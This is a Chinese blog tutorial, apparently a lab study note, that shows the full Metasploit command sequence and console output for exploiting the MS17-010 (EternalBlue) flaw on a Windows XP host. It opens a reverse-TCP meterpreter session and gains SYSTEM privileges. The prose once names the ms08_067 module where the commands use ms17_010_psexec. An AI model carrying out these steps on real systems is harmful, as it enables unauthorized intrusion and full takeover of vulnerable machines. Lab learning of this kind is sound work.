ms17_010（永恒之蓝）漏洞渗透步骤——MSF

最新推荐文章于 2024-04-29 23:02:27 发布

我重来不说话

最新推荐文章于 2024-04-29 23:02:27 发布

阅读量2.2k

点赞数 3

分类专栏：精通Metasploit学习笔记文章标签： metasploit 渗透测试 windows xp kali linux

本文链接：https://blog.csdn.net/qq_19623861/article/details/117061627

版权

精通Metasploit学习笔记专栏收录该内容

41 篇文章 30 订阅

订阅专栏

本文简单介绍了如何使用metasploit针对ms17_010进行渗透测试，仅供学习

测试环境	描述	ip
主机	kali2020	192.168.1.113
目标主机	win xp sp3	192.168.1.108

①启动msf，搜索ms17_010，使用msf中的auxiliary模块进行扫描

msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection


Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010

msf6 > use 4
msf6 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.1.108                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.108
rhosts => 192.168.1.108
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.1.108:445     - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 192.168.1.108:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

②结果提示目标存在永恒之蓝漏洞，重新搜素，使用ms08_067攻击模块，设置参数

msf6 auxiliary(scanner/smb/smb_ms17_010) > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection


Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010

msf6 auxiliary(scanner/smb/smb_ms17_010) > use 2
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                192.168.1.108                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445                                                             yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.108
rhosts => 192.168.1.108
msf6 exploit(windows/smb/ms17_010_psexec) >

③进行攻击，获取meterpreter权限并进行提权

msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.108:445 - Target OS: Windows 5.1
[*] 192.168.1.108:445 - Filling barrel with fish... done
[*] 192.168.1.108:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.108:445 -         [*] Preparing dynamite...
[*] 192.168.1.108:445 -                 [*] Trying stick 1 (x86)...Boom!
[*] 192.168.1.108:445 -         [+] Successfully Leaked Transaction!
[*] 192.168.1.108:445 -         [+] Successfully caught Fish-in-a-barrel
[*] 192.168.1.108:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.1.108:445 - Reading from CONNECTION struct at: 0x88c03010
[*] 192.168.1.108:445 - Built a write-what-where primitive...
[+] 192.168.1.108:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.108:445 - Selecting native target
[*] 192.168.1.108:445 - Uploading payload... kRwOnYlP.exe
[*] 192.168.1.108:445 - Created \kRwOnYlP.exe...
[+] 192.168.1.108:445 - Service started successfully...
[*] 192.168.1.108:445 - Deleting \kRwOnYlP.exe...
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 3 opened (192.168.1.113:4444 -> 192.168.1.108:2363) at 2021-05-20 09:01:47 +0800

meterpreter > [*] Meterpreter session 4 opened (192.168.1.113:4444 -> 192.168.1.108:2323) at 2021-05-20 09:01:48 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

我重来不说话

关注

3
点赞
踩
5

收藏

觉得还不错? 一键收藏
打赏
0
评论
ms17_010（永恒之蓝）漏洞渗透步骤——MSF

测试环境描述ip主机kali2020192.168.1.113目标主机win xp sp3192.168.1.108①启动msf，搜索ms17_010，使用msf中的auxiliary模块进行扫描msf6 > search ms17_010Matching Modules================ # Name Disclosure Date Rank...
复制链接

扫一扫